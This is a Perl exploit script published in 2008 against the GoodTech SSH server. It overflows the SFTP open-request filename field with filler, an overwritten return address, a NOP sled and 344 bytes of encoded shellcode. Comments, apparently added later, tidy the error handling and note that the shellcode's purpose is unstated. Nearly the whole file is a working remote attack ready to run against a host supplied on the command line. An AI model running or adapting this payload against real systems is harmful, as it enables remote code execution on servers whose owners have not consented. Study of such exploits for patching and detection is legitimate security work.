
# Title : GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit
# Published : 2008-10-22
# Author : r0ut3r


# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# The SSH_FXP_OPEN (SFTP file open) request handler contains a buffer overflow in the filename field.
#
# The other SFTP operations that take a path (opendir, unlink, etc.) are affected as well.
#
# 0day for 2 months :)

use strict;
use warnings;

use Net::SSH2;

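# --- Target / credentials -------------------------------------------------
# Optional positional arguments: host, port, user, password. Defaults are the
# author's original values. The overflow is reached through the SFTP
# subsystem of an *authenticated* session (see auth_password below), so a
# valid account on the target is required.
my ($ip, $port, $user, $pass) = @ARGV;
$ip   = "127.0.0.1" unless defined $ip;
$port = 22          unless defined $port;
$user = "root"      unless defined $user;
$pass = "yahh"      unless defined $pass;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port)
    or die "[-] Unable to connect!\n";

# The original had `|| "[-] Incorrect credentials"` here, which merely
# evaluated a bare string and carried on after a failed login. Abort instead.
$ssh2->auth_password($user, $pass)
    or die "[-] Incorrect credentials\n";
print "[+] Sending payload\n";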

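# --- Payload --------------------------------------------------------------
# Buffer sent as the SSH_FXP_OPEN filename: 164 bytes of filler up to the
# saved return address, the 4-byte overwrite, a short NOP sled, then the
# shellcode. All byte strings below are "\x.." hex escapes; a copy of this
# listing in which the backslashes were stripped ("x49x13x9cx7c") sends the
# literal ASCII text instead and cannot work.

# Filler: 164 bytes reach the saved return address on the author's build.
my $junk = 'A' x 164;

# Return-address overwrite, little-endian 0x7c9c1349. The author labels it
# "call esp" but does not say which module or OS/service pack it comes
# from, so it must be re-verified against the actual target before use.
my $eip = "\x49\x13\x9c\x7c"; # call esp

# Short NOP sled in front of the shellcode.
my $nops = "\x90" x 20;

# 344-byte shellcode. The leading bytes look like a self-decoding XOR stub
# (i.e. the payload is encoded); nothing on this page states what the
# decoded payload does, so decode/disassemble it before running this
# against anything you do not own.
my $shellcode =
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x33" .
    "\x2e\x9c\x0e\x83\xeb\xfc\xe2\xf4\xcf\x44\x77\x43\xdb\xd7\x63\xf1" .
    "\xcc\x4e\x17\x62\x17\x0a\x17\x4b\x0f\xa5\xe0\x0b\x4b\x2f\x73\x85" .
    "\x7c\x36\x17\x51\x13\x2f\x77\x47\xb8\x1a\x17\x0f\xdd\x1f\x5c\x97" .
    "\x9f\xaa\x5c\x7a\x34\xef\x56\x03\x32\xec\x77\xfa\x08\x7a\xb8\x26" .
    "\x46\xcb\x17\x51\x17\x2f\x77\x68\xb8\x22\xd7\x85\x6c\x32\x9d\xe5" .
    "\x30\x02\x17\x87\x5f\x0a\x80\x6f\xf0\x1f\x47\x6a\xb8\x6d\xac\x85" .
    "\x73\x22\x17\x7e\x2f\x83\x17\x4e\x3b\x70\xf4\x80\x7d\x20\x70\x5e" .
    "\xcc\xf8\xfa\x5d\x55\x46\xaf\x3c\x5b\x59\xef\x3c\x6c\x7a\x63\xde" .
    "\x5b\xe5\x71\xf2\x08\x7e\x63\xd8\x6c\xa7\x79\x68\xb2\xc3\x94\x0c" .
    "\x66\x44\x9e\xf1\xe3\x46\x45\x07\xc6\x83\xcb\xf1\xe5\x7d\xcf\x5d" .
    "\x60\x7d\xdf\x5d\x70\x7d\x63\xde\x55\x46\x8d\x52\x55\x7d\x15\xef" .
    "\xa6\x46\x38\x14\x43\xe9\xcb\xf1\xe5\x44\x8c\x5f\x66\xd1\x4c\x66" .
    "\x97\x83\xb2\xe7\x64\xd1\x4a\x5d\x66\xd1\x4c\x66\xd6\x67\x1a\x47" .
    "\x64\xd1\x4a\x5e\x67\x7a\xc9\xf1\xe3\xbd\xf4\xe9\x4a\xe8\xe5\x59" .
    "\xcc\xf8\xc9\xf1\xe3\x48\xf6\x6a\x55\x46\xff\x63\xba\xcb\xf6\x5e" .
    "\x6a\x07\x50\x87\xd4\x44\xd8\x87\xd1\x1f\x5c\xfd\x99\xd0\xde\x23" .
    "\xcd\x6c\xb0\x9d\xbe\x54\xa4\xa5\x98\x85\xf4\x7c\xcd\x9d\x8a\xf1" .
    "\x46\x6a\x63\xd8\x68\x79\xce\x5f\x62\x7f\xf6\x0f\x62\x7f\xc9\x5f" .
    "\xcc\xfe\xf4\xa3\xea\x2b\x52\x5d\xcc\xf8\xf6\xf1\xcc\x19\x63\xde" .
    "\xb8\x79\x60\x8d\xf7\x4a\x63\xd8\x61\xd1\x4c\x66\xdc\xe0\x7c\x6e" .
    "\x60\xd1\x4a\xf1\xe3\x2e\x9c\x0e";

# build_payload: returns the complete buffer in the order filler, return
# address, NOP sled, shellcode (164 + 4 + 20 + 344 = 532 bytes).
sub build_payload {
    return join '', $junk, $eip, $nops, $shellcode;
}

my $payload = build_payload();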

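# --- Delivery -------------------------------------------------------------
# The overflow is triggered by the filename of an SSH_FXP_OPEN request, so
# the payload is simply passed as the path to open(). The original called
# open() on whatever sftp() returned; if the subsystem could not be started
# that is undef and the script died with an unhelpful "Can't call method"
# error, so abort explicitly instead.
my $sftp = $ssh2->sftp()
    or die "[-] Unable to start the SFTP subsystem\n";

# open()'s return value is deliberately not checked: if the overflow takes
# effect on the server the request will presumably not complete normally,
# so a failure here says nothing about whether the payload landed.
$sftp->open($payload);

print "[+] Sent";
$ssh2->disconnect;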
